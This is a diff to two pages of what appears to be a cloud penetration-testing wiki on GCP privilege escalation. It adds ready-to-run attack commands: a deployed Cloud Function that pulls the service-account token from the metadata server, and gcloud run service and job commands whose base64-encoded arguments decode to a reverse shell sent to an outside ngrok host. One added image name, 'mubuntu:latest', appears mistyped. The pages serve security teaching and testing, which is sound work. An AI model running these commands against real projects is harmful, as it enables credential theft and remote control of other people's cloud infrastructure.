GITBOOK-615: No subject

pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md

@@ -34,6 +34,38 @@ Exploit scripts for this method can be found [here](https://github.com/RhinoSecu
 An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.\
 Some privileges to trigger the function might be required.
 
+```bash
+# Create new code
+temp_dir=$(mktemp -d)
+
+cat > $temp_dir/main.py <<EOF
+import subprocess
+
+def main(request):
+    cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
+    result = subprocess.check_output(cmd, shell=True, text=True)
+    return result
+EOF
+
+echo "" > $temp_dir/requirements.txt
+
+zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt
+
+# Update code
+gcloud functions deploy <cloudfunction-name> \
+  --runtime python312 \
+  --trigger-http \
+  --source $temp_dir \
+  --entry-point main \
+  --service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
+  --allow-unauthenticated
+
+# If you don't have permissions to change the IAM policy, the "--allow-unauthenticated" will just fail and do nothing
+
+# Get SA tokin calling the new function code
+gcloud functions call <cloudfunction-name>
+```
+
 The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
 
 ### `cloudfunctions.functions.sourceCodeSet`
@@ -62,7 +94,11 @@ Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.act
 
 ### Bucket Write Permissions
 
-An attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and will be able to **execute arbitrary** code once it's executed.
+You might think that an attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and then make the function **execute arbitrary** code.
+
+{% hint style="success" %}
+**However, this isn't true, just overwriting the code inside the bucket won't modify the code that is being executed.**
+{% endhint %}
 
 ## References
 

pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md

@@ -36,12 +36,14 @@ Like the previous one but updating a service:
 
 ```bash
 gcloud run deploy hacked \
---image=marketplace.gcr.io/google/ubuntu2004 \
+--image=ubuntu:latest \
 --command=bash \
 --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
 --service-account="<proj-num>[email protected]" \
 --region=us-central1 \
 --allow-unauthenticated
+
+# If you don't have permissions to use "--allow-unauthenticated", dont use it
 ```
 
 ### `run.services.setIamPolicy`
@@ -52,18 +54,28 @@ Give yourself previous permissions over cloud Run.
 
 Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/m-run.jobs.create.sh).
 
+```bash
+gcloud beta run jobs create jab-cloudrun-3326 \
+--image=ubuntu:latest \
+--command=bash \
+--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
+--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
+--region=us-central1
+
+```
+
 ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)
 
 Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:
 
 ```bash
 gcloud beta run jobs update hacked \
---image=marketplace.gcr.io/google/ubuntu2004 \
+--image=mubuntu:latest \
 --command=bash \
 --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
 --service-account=<proj-num>[email protected] \
 --region=us-central1 \
---project=security-devbox --execute-now
+--execute-now
 ```
 
 ### `run.jobs.setIamPolicy`